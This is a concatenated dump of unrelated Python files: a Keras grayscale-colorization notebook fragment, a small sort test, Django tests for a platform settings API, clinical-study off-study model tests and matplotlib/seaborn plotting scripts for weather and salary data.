imgs_.append(cv2.cvtColor(imgs[i], cv2.COLOR_LAB2RGB))
imgs_ = np.array(imgs_)
# print(imgs_.shape)
return imgs_
temp = get_rbg_from_lab(gray_imgs = images_gray, ab_imgs = images_lab, n = 1)
# new_model = Model(inputs = modelv2.inputs, outputs = modelv2.output)
# for i, layer in enumerate(new_model.layers):
# layer.trainable = False
# x = Reshape((5, 5, 40))(new_model.output)
# x = Conv2DTranspose(strides = 2, kernel_size = 5, filters = 40, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "valid", activation = tf.nn.relu)(x)
# x = Conv2DTranspose(strides = 3, kernel_size = 7, filters = 40, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu)(x)
# x = Conv2DTranspose(strides = 3, kernel_size = 9, filters = 20, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu)(x)
# x = Conv2DTranspose(strides = 4, kernel_size = 11, filters = 20, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu)(x)
# x = Conv2D(strides = 2, kernel_size = 5, filters = 12, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "valid", activation = tf.nn.relu)(x)
# x = Conv2D(strides = 1, kernel_size = 9, filters = 3, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "valid", activation = tf.nn.relu)(x)
# final_model = Model(inputs = new_model.inputs, outputs = x)
#final_model.predict(get_rbg_from_lab(images_gray, images_lab, n = 2)).shape
# final_model.compile(optimizer = tf.keras.optimizers.SGD(lr=0.01, momentum=0.0, decay=0.0, nesterov=False), loss = tf.losses.mean_pairwise_squared_error)
# In[5]:
def pipe_line_img(gray_scale_imgs, batch_size = 100, preprocess_f = preprocess_input):
imgs = np.zeros((batch_size, 224, 224, 3))
for i in range(0, 3):
imgs[:batch_size, :, :,i] = gray_scale_imgs[:batch_size]
return preprocess_f(imgs)
tbCallBack = tf.keras.callbacks.TensorBoard(log_dir='./folder_to_save_graph_3', histogram_freq=0, write_graph=True, write_images=True)
imgs_for_input = pipe_line_img(images_gray, batch_size = 1500)
imgs_for_output = preprocess_input(get_rbg_from_lab(gray_imgs = images_gray, ab_imgs = images_lab, n = 1500))
# plt.imshow(imgs_for_input)
# print(imgs_for_input.shape)
# plt.imshow(imgs_for_output[1])
# plt.imshow(imgs_for_input[1])
# print(imgs_for_output)
# In[6]:
# model.add(layers.Dense(output_dim=n, activation=softMaxAxis(1)))
# In[7]:
model_simple = Sequential()
model_simple.add(Conv2D(strides = 1, kernel_size = 3, filters = 16, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu, input_shape = (224, 224, 3)))
model_simple.add(Conv2D(strides = 1, kernel_size = 3, filters = 32, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu))
model_simple.add(Conv2D(strides = 1, kernel_size = 3, filters = 64, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu, input_shape = (224, 224, 3)))
# model_simple.add(Conv2D(strides = 1, kernel_size = 3, filters = 128, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu))
# model_simple.add(Dense(units=1, activation='softmax'))
model_simple.add(Conv2D(strides = 1, kernel_size = 3, filters = 3, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu))
# model_simple.add(Conv2DTranspose(strides = 1, kernel_size = 3, filters = 3, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu))
# model_simple.add(Conv2D(strides = 1, kernel_size = 3, filters = 12, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "valid", activation = tf.nn.relu))
# model_simple.add(Conv2DTranspose(strides = 1, kernel_size = 3, filters = 12, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu))
# model_simple.add(Conv2DTranspose(strides = 1, kernel_size = 3, filters = 3, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "same", activation = tf.nn.relu))
# model_simple.add(Conv2DTranspose(strides = 1, kernel_size = 3, filters = 3, use_bias = True, bias_initializer = tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05) , padding = "valid", activation = tf.nn.relu))
model_simple.compile(optimizer = tf.keras.optimizers.Adam(epsilon = 1e-4), loss = tf.losses.mean_pairwise_squared_error)
# imgs_for_s = np.zeros((1000, 224, 224, 1))
# imgs_for_s[:, :, :, 0] = images_gray[:1000]
# prediction = model_simple.predict(imgs_for_input)
# In[8]:
model_simple.summary()
# In[ ]:
# In[ ]:
# In[ ]:
# In[9]:
model_simple.fit(imgs_for_input[:1000], imgs_for_output[:1000], epochs = 50, callbacks = [tbCallBack], validation_split = 0.1, shuffle = True)
# model_simple.fit(imgs_for_input, imgs_for_output, epochs = 1100, batch_size = 16)
# prediction = model_simple.predict(imgs_for_input[:1000])
# In[10]:
imgs = np.zeros((1, 224, 224, 3))
for i in range(0, 3):
imgs[0, :, :,i] = images_gray[1029]
temp_img = preprocess_input(imgs)
prediction = model_simple.predict(temp_img)
image_1029 = np.concatenate((imgs_for_input[1029], imgs_for_output[1029], prediction[0,:,:,]), 1)
# print(img_list.shape)
plt.imshow(image_1029)
plt.axis("off")
# In[13]:
imgs = np.zeros((1, 224, 224, 3))
for i in range(0, 3):
imgs[0, :, :,i] = images_gray[1029]
temp_img = preprocess_input(imgs)
prediction1 = model_simple.predict(temp_img)
imgs = np.zeros((1, 224, 224, 3))
for i in range(0, 3):
imgs[0, :, :,i] = images_gray[1028]
temp_img = preprocess_input(imgs)
prediction0 = model_simple.predict(temp_img)
image_0 = np.concatenate((imgs_for_input[1028], imgs_for_output[1028], prediction0[0,:,:,]), 1)
image_1 = np.concatenate((imgs_for_input[1029], imgs_for_output[1029], prediction1[0,:,:,]), 1)
image_new_two = np.concatenate((image_0, image_1), 0)
# print(img_list.shape)
plt.imshow(image_1029)
plt.axis("off")
# plt.imshow(prediction[0,:,:,])
# In[ ]:
image_cake = np.concatenate((imgs_for_input[2], imgs_for_output[2], prediction[2,:,:,]), 1)
# print(img_list.shape)
plt.imshow(image_cake)
plt.axis("off")
# In[ ]:
# img_list = []
# img_list.append(
image_noidea = np.concatenate((imgs_for_input[5], imgs_for_output[5], prediction[5,:,:,]), 1)
# img_list = np.array(img_list)
# img_list = np.squeeze(img_list, axis=0)
# print(img_list.shape)
plt.imshow(image_noidea)
plt.axis("off")
# In[ ]:
image_two = np.concatenate((image_cake, image_noidea), 0)
plt.imshow(image_two)
plt.axis("off")
# In[ ]:
# #split train and validation data
# import numpy as np
# from matplotlib import pyplot as plt
# images_gray = np.load(opt.dataroot+'A/gray_scale.npy')
# images_lab = np.load(opt.dataroot+'B/ab1.npy')
# np.save(opt.dataroot + 'Train/A/gray_scale.npy', images_gray[:300])
# np.save(opt.dataroot + 'Train/B/ab1.npy', images_lab[:300] )
# images_gray = np.load(opt.dataroot + 'Train/A/gray_scale.npy')
# images_lab = np.load(opt.dataroot + 'Train/B/ab1.npy')
# plt.figure()
# plt.imshow(images_gray[29],cmap='gray')
# plt.show()
# images_gray = np.load(opt.dataroot+'A/gray_scale.npy')
# images_lab = np.load(opt.dataroot+'B/ab1.npy')
# np.save(opt.dataroot + 'Test/A/gray_scale.npy', images_gray[1000:1030])
# np.save(opt.dataroot + 'Test/B/ab1.npy', images_lab[1000:1030])
# images_gray = np.load(opt.dataroot + 'Test/A/gray_scale.npy')
# images_lab = np.load(opt.dataroot + 'Test/B/ab1.npy')
# plt.figure()
# plt.imshow(images_gray[0],cmap='gray')
# plt.show()
# In[ ]:
# trainDataloader = DataLoader(ImageDataset(opt.dataroot + 'Train/', transforms_ = transforms_), batch_size=opt.batchSize, shuffle=True, num_workers=opt.n_cpu)
# testDataloader = DataLoader(ImageDataset(opt.dataroot + 'Test/', transforms_ = transforms_), batch_size=opt.batchSize, shuffle=False, num_workers=opt.n_cpu)
|
20,712 | 3badcc17ff464c531702ea661df335b9d44c7bcd | def test_sortfunction(sortfunction):
assert(list(sortfunction([3,1,5,2,17,22,42,38])) == [1,2,3,5,17,22,38,42])
assert(list(sortfunction([1,2,3,4,5])) == [1,2,3,4,5])
assert(list(sortfunction([])) == [])
print("Alle Tests für {} ok".format(sortfunction.__name__))
|
20,713 | cc8857835edd68d7cafb39f8817492b0ed6dc909 | from decimal import Decimal
import mock
from django.contrib.auth.models import Group, Permission
from django.core.files.base import File
from django.test.utils import override_settings
from django.urls import reverse
from django_elasticsearch_dsl.test import ESTestCase
from rest_framework import status
from bluebottle.clients import properties
from bluebottle.cms.models import SitePlatformSettings
from bluebottle.funding.models import FundingPlatformSettings
from bluebottle.initiatives.models import InitiativePlatformSettings
from bluebottle.members.models import MemberPlatformSettings
from bluebottle.notifications.models import NotificationPlatformSettings
from bluebottle.test.factory_models.accounts import BlueBottleUserFactory
from bluebottle.test.utils import BluebottleTestCase
class ClientSettingsTestCase(BluebottleTestCase):
def setUp(self):
super(ClientSettingsTestCase, self).setUp()
self.settings_url = reverse('settings')
@override_settings(PARENT={'child': True}, EXPOSED_TENANT_PROPERTIES=['parent.child'])
def test_nested_exposed_properties(self):
response = self.client.get(self.settings_url)
self.assertEqual(response.data['parent']['child'], True)
@override_settings(CLOSED_SITE=False, TOP_SECRET="*****", EXPOSED_TENANT_PROPERTIES=['closed_site'])
def test_settings_show(self):
# Check that exposed property is in settings api, and other settings are not shown
response = self.client.get(self.settings_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['closedSite'], False)
self.assertNotIn('topSecret', response.data)
# Check that exposed setting gets overwritten by client property
setattr(properties, 'CLOSED_SITE', True)
response = self.client.get(self.settings_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['closedSite'], True)
# Check that previously hidden setting can be exposed
setattr(properties, 'EXPOSED_TENANT_PROPERTIES', ['closed_site', 'top_secret'])
response = self.client.get(self.settings_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('topSecret', response.data)
setattr(properties, 'CLOSED_SITE', False)
@override_settings(TOKEN_AUTH={'assertion_mapping': {'first_name': 'urn:first_name'}})
def test_settings_read_only(self):
# Check that exposed property is in settings api, and other settings are not shown
response = self.client.get(self.settings_url)
self.assertEqual(response.data['readOnlyFields'], {'user': ['first_name']})
@override_settings(
PAYMENT_METHODS=[{
'provider': 'docdata',
'id': 'docdata-ideal',
'profile': 'ideal',
'name': 'iDEAL',
'restricted_countries': ('NL',),
'currencies': {
'EUR': {'max_amount': 100}
}
}, {
'provider': 'docdata',
'id': 'docdata-directdebit',
'profile': 'directdebit',
'name': 'Direct Debit',
'restricted_countries': ('NL', 'BE',),
'currencies': {
'EUR': {'min_amount': 10, 'max_amount': 100}
}
}, {
'provider': 'docdata',
'id': 'docdata-creditcard',
'profile': 'creditcard',
'name': 'CreditCard',
'currencies': {
'USD': {'min_amount': 5, 'max_amount': 100},
'NGN': {'min_amount': 3000, 'max_amount': 100},
'XOF': {'min_amount': 5000, 'max_amount': 100},
}
}],
DEFAULT_CURRENCY='USD'
)
def test_settings_currencies(self):
# Check that exposed property is in settings api, and other settings are not shown
response = self.client.get(self.settings_url)
expected = [
{
'symbol': '€',
'code': 'EUR',
'name': 'Euro',
'rate': Decimal(1.5),
'minAmount': 0
},
{
'symbol': '₦',
'code': 'NGN',
'name': 'Nigerian Naira',
'rate': Decimal(500.0),
'minAmount': 3000
},
{
'symbol': '$',
'code': 'USD',
'name': 'US Dollar',
'rate': Decimal(1.0),
'minAmount': 5
},
{
'symbol': 'CFA',
'code': 'XOF',
'name': 'West African CFA Franc',
'rate': Decimal(1000.0),
'minAmount': 5000
},
]
result = response.data['currencies']
result = sorted(result, key=lambda i: i['name'])
expected = sorted(expected, key=lambda i: i['name'])
self.assertEqual(result, expected)
@override_settings(
ELASTICSEARCH_DSL_AUTOSYNC=True,
ELASTICSEARCH_DSL_AUTO_REFRESH=True
)
class TestDefaultAPI(ESTestCase, BluebottleTestCase):
"""
Test the default API, open and closed, authenticated or not
with default permissions
"""
def setUp(self):
super(TestDefaultAPI, self).setUp()
self.init_projects()
self.user = BlueBottleUserFactory.create()
self.user_token = "JWT {0}".format(self.user.get_jwt_token())
self.initiatives_url = reverse('initiative-preview-list')
def test_open_api(self):
""" request open api, expect projects """
response = self.client.get(self.initiatives_url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
@mock.patch('bluebottle.clients.properties.CLOSED_SITE', True)
def test_closed_api_not_authenticated(self):
""" request closed api, expect 403 ? if not authenticated """
anonymous = Group.objects.get(name='Anonymous')
anonymous.permissions.remove(
Permission.objects.get(codename='api_read_initiative')
)
response = self.client.get(self.initiatives_url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
@mock.patch('bluebottle.clients.properties.CLOSED_SITE', True)
def test_closed_api_authenticated(self):
""" request closed api, expect projects if authenticated """
response = self.client.get(self.initiatives_url, token=self.user_token)
self.assertEqual(response.status_code, status.HTTP_200_OK)
class TestPlatformSettingsApi(BluebottleTestCase):
"""
Test platform settings api.
"""
def setUp(self):
super(TestPlatformSettingsApi, self).setUp()
self.init_projects()
self.settings_url = reverse('settings')
def test_site_platform_settings(self):
with open('./bluebottle/cms/tests/test_images/upload.png', 'rb') as f:
image = File(f)
# Create site platform settings and confirm they end up correctly in settings api
SitePlatformSettings.objects.create(
contact_email='malle@epp.ie',
contact_phone='+3163202128',
copyright='Malle Eppie Ltd.',
powered_by_text='Powered by',
powered_by_link='https://epp.ie',
footer_banner=image
)
response = self.client.get(self.settings_url)
self.assertEqual(response.data['platform']['content']['contact_email'], 'malle@epp.ie')
self.assertEqual(response.data['platform']['content']['contact_phone'], '+3163202128')
self.assertEqual(response.data['platform']['content']['copyright'], 'Malle Eppie Ltd.')
self.assertEqual(response.data['platform']['content']['powered_by_link'], 'https://epp.ie')
self.assertEqual(response.data['platform']['content']['powered_by_text'], 'Powered by')
self.assertTrue(
response.data['platform']['content']['footer_banner'].startswith(
'/media/'
)
)
def test_initiative_platform_settings(self):
# Create initiative platform settings and confirm they end up correctly in settings api
InitiativePlatformSettings.objects.create(
activity_types=['event', 'job'],
initiative_search_filters=['category', 'location'],
activity_search_filters=['type', 'skill', 'status'],
contact_method='phone',
require_organization=True,
team_activities=True
)
response = self.client.get(self.settings_url)
self.assertEqual(response.data['platform']['initiatives']['activity_types'], ['event', 'job'])
self.assertEqual(
response.data['platform']['initiatives']['activity_search_filters'],
['type', 'skill', 'status']
)
self.assertEqual(
response.data['platform']['initiatives']['initiative_search_filters'],
['category', 'location']
)
self.assertEqual(response.data['platform']['initiatives']['require_organization'], True)
self.assertEqual(response.data['platform']['initiatives']['contact_method'], 'phone')
self.assertEqual(response.data['platform']['initiatives']['team_activities'], True)
def test_notification_platform_settings(self):
# Create notification platform settings and confirm they end up correctly in settings api
NotificationPlatformSettings.objects.create(
share_options=['twitter', 'facebook_at_work'],
default_yammer_group_id='1234',
facebook_at_work_url='https://my.facebook.com'
)
response = self.client.get(self.settings_url)
self.assertEqual(response.data['platform']['notifications']['share_options'], ['twitter', 'facebook_at_work'])
self.assertEqual(response.data['platform']['notifications']['facebook_at_work_url'], 'https://my.facebook.com')
self.assertEqual(response.data['platform']['notifications']['default_yammer_group_id'], '1234')
def test_funding_platform_settings(self):
# Create funding platform settings and confirm they end up correctly in settings api
FundingPlatformSettings.objects.create(
allow_anonymous_rewards=True
)
response = self.client.get(self.settings_url)
self.assertEqual(response.data['platform']['funding']['allow_anonymous_rewards'], True)
def test_member_platform_settings(self):
MemberPlatformSettings.objects.create(
closed=False,
require_consent=True,
retention_anonymize=24,
retention_delete=36
)
response = self.client.get(self.settings_url)
self.assertEqual(response.data['platform']['members']['closed'], False)
self.assertEqual(response.data['platform']['members']['require_consent'], True)
self.assertEqual(response.data['platform']['members']['retention_anonymize'], 24)
self.assertEqual(response.data['platform']['members']['retention_delete'], 36)
def test_member_platform_settings_closed(self):
MemberPlatformSettings.objects.create(
closed=True,
require_consent=True,
consent_link="example.com"
)
user = BlueBottleUserFactory.create()
user_token = "JWT {0}".format(user.get_jwt_token())
response = self.client.get(self.settings_url, token=user_token)
self.assertEqual(response.data['platform']['members']['closed'], True)
self.assertEqual(response.data['platform']['members']['require_consent'], True)
self.assertEqual(response.data['platform']['members']['consent_link'], 'example.com')
def test_member_platform_settings_closed_anonymous(self):
MemberPlatformSettings.objects.create(
closed=True,
require_consent=True,
consent_link="example.com"
)
response = self.client.get(self.settings_url)
content = {
'contact_email': None,
'contact_phone': None,
'copyright': None,
'powered_by_link': None,
'powered_by_logo': None,
'powered_by_text': None,
'metadata_title': None,
'metadata_description': None,
'metadata_keywords': None,
'start_page': None,
'logo': None,
'favicons': {
'large': '',
'small': ''
},
'action_color': None,
'action_text_color': '#ffffff',
'alternative_link_color': None,
'description_color': None,
'description_text_color': '#ffffff',
'footer_color': '#3b3b3b',
'footer_text_color': '#ffffff',
'title_font': None,
'body_font': None,
'footer_banner': None,
}
members = {
'closed': True,
'background': '',
'login_methods': ['password'],
'session_only': False,
'consent_link': 'example.com',
'email_domain': None,
'confirm_signup': False
}
self.assertEqual(response.data['platform']['members'], members)
self.assertEqual(response.data['platform']['content'], content)
def test_member_platform_required_settings(self):
MemberPlatformSettings.objects.create(
require_office=True,
verify_office=False
)
response = self.client.get(self.settings_url)
self.assertEqual(response.data['platform']['members']['require_office'], True)
self.assertEqual(response.data['platform']['members']['verify_office'], False)
|
20,714 | 9b2787109b9607cb5ad474cf33f42e969857f97d | import csv
from matplotlib import pyplot as plt
filename = 'sitka_weather_2018_simple.csv'
with open(filename) as f:
reader = csv.reader(f)
header_row = next(reader)
print(header_row)
for index, column_header in enumerate(header_row):
print(index, column_header)
highs = []
mins = []
delta = []
for row in reader:
min = int(row[6])
mins.append(min)
high = int(row[5])
highs.append(high)
delta.append(high - min)
print(highs)
fig = plt.figure(dpi=128, figsize=(10, 6))
plt.plot(highs, c='red')
plt.plot(mins, c='blue')
plt.plot(delta, c='black')
plt.title("Daily high temperatures, July 2014", fontsize=24)
plt.xlabel('', fontsize=16)
plt.ylabel("Temperature (F)", fontsize=16)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.show() |
20,715 | bbf0f7711db7627c29b7811aeaeed1b19154f54b | import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from removeZero import removeZero
### Plot Salary Distribution for each Year
### Import CSV file
df = pd.read_csv('salary_gscholar_Washington.csv')
df.dropna(how='any', inplace=True)
df = df.reset_index()
df_2012, df_2013, df_2014, df_2015, df_2016 = removeZero(df)
##f, ((ax1, ax2, ax3), (ax4, ax5, ax6)) = plt.subplots(2,3, sharex=True)
##
##sns.distplot(df_2012['2012'], ax=ax1)
##sns.distplot(df_2013['2013'], ax=ax2)
##sns.distplot(df_2014['2014'], ax=ax3)
##sns.distplot(df_2015['2015'], ax=ax4)
##sns.distplot(df_2016['2016'], ax=ax5)
##plt.setp(ax4.get_xticklabels(), rotation=90)
##plt.setp(ax5.get_xticklabels(), rotation=90)
##plt.setp(ax6.get_xticklabels(), rotation=90)
##
##
##plt.show()
f, ((ax1, ax2, ax3), (ax4, ax5, ax6)) = plt.subplots(2,3, sharex=False)
sns.distplot(df_2012['Total Citations'], ax=ax1)
sns.distplot(df_2013['h-index'], ax=ax2)
sns.distplot(df_2014['5 year h-index'], ax=ax3)
sns.distplot(df_2015['i10-index'], ax=ax4)
sns.distplot(df_2016['5 year i10-index'], ax=ax5)
##plt.setp(ax4.get_xticklabels(), rotation=90)
##plt.setp(ax5.get_xticklabels(), rotation=90)
##plt.setp(ax6.get_xticklabels(), rotation=90)
plt.show()
|
20,716 | 35bf0be61a60de2b865d97c2fb3893dd726e6a76 | from dateutil.relativedelta import relativedelta
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase, tag
from edc_appointment.models import Appointment
from edc_appointment.tests.models import (
OffScheduleOne,
SubjectConsent,
SubjectOffstudy,
SubjectVisit,
)
from edc_appointment.tests.visit_schedule import visit_schedule1, visit_schedule2
from edc_consent import NotConsentedError, site_consents
from edc_constants.constants import DEAD
from edc_facility.import_holidays import import_holidays
from edc_utils import get_dob, get_utcnow
from edc_visit_schedule.site_visit_schedules import site_visit_schedules
from edc_visit_tracking.constants import SCHEDULED
from ..utils import OffstudyError
from .consents import v1_consent
from .forms import BadNonCrfOneForm, CrfOneForm, NonCrfOneForm, SubjectOffstudyForm
from .models import BadNonCrfOne, CrfOne, NonCrfOne
class TestOffstudy(TestCase):
@classmethod
def setUpClass(cls):
site_consents.register(v1_consent)
import_holidays()
return super().setUpClass()
@classmethod
def tearDownClass(cls):
super().tearDownClass()
def setUp(self):
self.visit_schedule_name = "visit_schedule1"
self.schedule_name = "schedule1"
site_visit_schedules._registry = {}
site_visit_schedules.loaded = False
site_visit_schedules.register(visit_schedule1)
site_visit_schedules.register(visit_schedule2)
self.schedule1 = visit_schedule1.schedules.get("schedule1")
self.schedule2 = visit_schedule2.schedules.get("schedule2")
self.subject_identifier = "111111111"
self.subject_identifiers = [
self.subject_identifier,
"222222222",
"333333333",
"444444444",
]
self.consent_datetime = get_utcnow() - relativedelta(weeks=4)
dob = get_dob(age_in_years=25, now=self.consent_datetime)
for subject_identifier in self.subject_identifiers:
subject_consent = SubjectConsent.objects.create(
subject_identifier=subject_identifier,
identity=subject_identifier,
confirm_identity=subject_identifier,
consent_datetime=self.consent_datetime,
dob=dob,
)
self.schedule1.put_on_schedule(
subject_identifier=subject_consent.subject_identifier,
onschedule_datetime=self.consent_datetime,
)
self.subject_consent = SubjectConsent.objects.get(
subject_identifier=self.subject_identifier, dob=dob
)
def test_offstudy_model(self):
self.assertRaises(
OffstudyError,
SubjectOffstudy.objects.create,
subject_identifier=self.subject_identifier,
offstudy_datetime=(
self.consent_datetime + relativedelta(days=1) + relativedelta(minutes=1)
),
)
OffScheduleOne.objects.create(
subject_identifier=self.subject_identifier,
report_datetime=get_utcnow(),
offschedule_datetime=self.consent_datetime + relativedelta(days=1),
)
obj = SubjectOffstudy.objects.create(
subject_identifier=self.subject_identifier,
offstudy_datetime=(
self.consent_datetime + relativedelta(days=1) + relativedelta(minutes=1)
),
)
self.assertTrue(str(obj))
def test_offstudy_cls_subject_not_registered_by_offstudy_date(self):
OffScheduleOne.objects.create(
subject_identifier=self.subject_identifier,
report_datetime=get_utcnow(),
offschedule_datetime=self.consent_datetime + relativedelta(days=1),
)
self.assertRaises(
NotConsentedError,
SubjectOffstudy.objects.create,
subject_identifier=self.subject_identifier,
offstudy_datetime=self.consent_datetime - relativedelta(days=1),
)
def test_update_subject_visit_report_date_after_offstudy_date(self):
appointments = Appointment.objects.filter(
subject_identifier=self.subject_identifier
).order_by("appt_datetime")
appointment_datetimes = [appointment.appt_datetime for appointment in appointments]
# report visits for first and second appointment, 1, 2
for index, appointment in enumerate(appointments[0:2]):
SubjectVisit.objects.create(
appointment=appointment,
visit_schedule_name=appointment.visit_schedule_name,
schedule_name=appointment.schedule_name,
visit_code=appointment.visit_code,
report_datetime=appointment_datetimes[index],
study_status=SCHEDULED,
)
OffScheduleOne.objects.create(
subject_identifier=self.subject_identifier,
report_datetime=get_utcnow(),
offschedule_datetime=appointment_datetimes[1],
)
# report off study on same date as second visit
visit_schedule1.offstudy_model_cls.objects.create(
subject_identifier=self.subject_identifier,
offstudy_datetime=appointment_datetimes[1],
offstudy_reason=DEAD,
)
subject_visit = SubjectVisit.objects.all().order_by("report_datetime").last()
subject_visit.report_datetime = subject_visit.report_datetime + relativedelta(years=1)
self.assertRaises(OffstudyError, subject_visit.save)
def test_crf_model_mixin(self):
# get subject's appointments
appointments = Appointment.objects.filter(
subject_identifier=self.subject_identifier
).order_by("appt_datetime")
# get first appointment
# get first visit
subject_visit = SubjectVisit.objects.create(
appointment=appointments[0],
visit_schedule_name=appointments[0].visit_schedule_name,
schedule_name=appointments[0].schedule_name,
visit_code=appointments[0].visit_code,
report_datetime=appointments[0].appt_datetime,
study_status=SCHEDULED,
)
# get crf_one for this visit
crf_one = CrfOne(
subject_visit=subject_visit, report_datetime=appointments[0].appt_datetime
)
crf_one.save()
# get second appointment
# create second visit
subject_visit = SubjectVisit.objects.create(
appointment=appointments[1],
visit_schedule_name=appointments[1].visit_schedule_name,
schedule_name=appointments[1].schedule_name,
visit_code=appointments[1].visit_code,
report_datetime=appointments[1].appt_datetime,
study_status=SCHEDULED,
)
# take off schedule1
OffScheduleOne.objects.create(
subject_identifier=self.subject_identifier,
report_datetime=get_utcnow(),
offschedule_datetime=appointments[1].appt_datetime,
)
# create complete off-study form for 1 hour after
# first visit date
SubjectOffstudy.objects.create(
offstudy_datetime=appointments[1].appt_datetime,
subject_identifier=self.subject_identifier,
)
# show CRF saves OK
crf_one = CrfOne(
report_datetime=appointments[1].appt_datetime, subject_visit=subject_visit
)
try:
crf_one.save()
except OffstudyError as e:
self.fail(f"OffstudyError unexpectedly raised. Got {e}")
crf_one.report_datetime = crf_one.report_datetime + relativedelta(years=1)
self.assertRaises(OffstudyError, crf_one.save)
def test_non_crf_model_mixin(self):
non_crf_one = NonCrfOne.objects.create(
subject_identifier=self.subject_identifier,
report_datetime=self.consent_datetime,
)
# take off schedule1
OffScheduleOne.objects.create(
subject_identifier=self.subject_identifier,
report_datetime=get_utcnow(),
offschedule_datetime=(self.consent_datetime + relativedelta(hours=1)),
)
SubjectOffstudy.objects.create(
offstudy_datetime=self.consent_datetime + relativedelta(hours=1),
subject_identifier=self.subject_identifier,
)
try:
non_crf_one.save()
except OffstudyError as e:
self.fail(f"OffstudyError unexpectedly raised. Got {e}")
non_crf_one.report_datetime = non_crf_one.report_datetime + relativedelta(years=1)
self.assertRaises(OffstudyError, non_crf_one.save)
def test_bad_non_crf_model_mixin(self):
self.assertRaises(
ImproperlyConfigured,
BadNonCrfOne.objects.create,
subject_identifier=self.subject_identifier,
)
def test_modelform_mixin_ok(self):
data = dict(
subject_identifier=self.subject_identifier,
offstudy_datetime=get_utcnow(),
offstudy_reason=DEAD,
)
# take off schedule1
OffScheduleOne.objects.create(
subject_identifier=self.subject_identifier,
report_datetime=get_utcnow(),
offschedule_datetime=(self.consent_datetime + relativedelta(hours=1)),
)
form = SubjectOffstudyForm(data=data)
self.assertTrue(form.is_valid())
def test_offstudy_modelform(self):
data = dict(
subject_identifier=self.subject_identifier,
offstudy_datetime=get_utcnow(),
offstudy_reason=DEAD,
)
form = SubjectOffstudyForm(data=data)
self.assertFalse(form.is_valid())
self.assertIn("Subject is on schedule on this date", str(form.errors))
# take off schedule1
OffScheduleOne.objects.create(
subject_identifier=self.subject_identifier,
report_datetime=get_utcnow(),
offschedule_datetime=(self.consent_datetime + relativedelta(hours=1)),
)
form = SubjectOffstudyForm(data=data)
self.assertTrue(form.is_valid())
def test_crf_modelform_ok(self):
appointments = Appointment.objects.filter(
subject_identifier=self.subject_identifier
).order_by("appt_datetime")
subject_visit = SubjectVisit.objects.create(
appointment=appointments[0],
visit_schedule_name=appointments[0].visit_schedule_name,
schedule_name=appointments[0].schedule_name,
visit_code=appointments[0].visit_code,
report_datetime=appointments[0].appt_datetime,
study_status=SCHEDULED,
)
data = dict(
subject_visit=str(subject_visit.id),
report_datetime=appointments[0].appt_datetime,
)
form = CrfOneForm(data=data)
self.assertTrue(form.is_valid())
# take off schedule1
OffScheduleOne.objects.create(
subject_identifier=self.subject_identifier,
report_datetime=get_utcnow(),
offschedule_datetime=(appointments[0].appt_datetime + relativedelta(hours=1)),
)
SubjectOffstudy.objects.create(
offstudy_datetime=appointments[0].appt_datetime + relativedelta(hours=1),
subject_identifier=self.subject_identifier,
)
form = CrfOneForm(data=data)
self.assertTrue(form.is_valid())
data = dict(
subject_visit=str(subject_visit.id),
report_datetime=appointments[0].appt_datetime + relativedelta(hours=2),
)
form = CrfOneForm(data=data)
self.assertFalse(form.is_valid())
self.assertIn("Report date comes after subject", str(form.errors))
def test_non_crf_modelform(self):
data = dict(
subject_identifier=self.subject_identifier,
report_datetime=self.consent_datetime,
)
form = NonCrfOneForm(data=data)
self.assertTrue(form.is_valid())
# take off schedule1
OffScheduleOne.objects.create(
subject_identifier=self.subject_identifier,
report_datetime=get_utcnow(),
offschedule_datetime=(self.consent_datetime + relativedelta(hours=1)),
)
SubjectOffstudy.objects.create(
subject_identifier=self.subject_identifier,
offstudy_datetime=(self.consent_datetime + relativedelta(hours=1)),
)
form = NonCrfOneForm(data=data)
self.assertTrue(form.is_valid())
data = dict(
subject_identifier=self.subject_identifier,
report_datetime=self.consent_datetime + relativedelta(hours=2),
)
form = NonCrfOneForm(data=data)
self.assertFalse(form.is_valid())
self.assertIn("Report date comes after subject", str(form.errors))
def test_bad_non_crf_modelform(self):
data = dict(
subject_identifier=self.subject_identifier,
report_datetime=self.consent_datetime,
)
form = BadNonCrfOneForm(data=data)
self.assertRaises(ImproperlyConfigured, form.is_valid)
|
20,717 | 7cf5b357906abcb7500974393b3a2d9b564f4889 | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
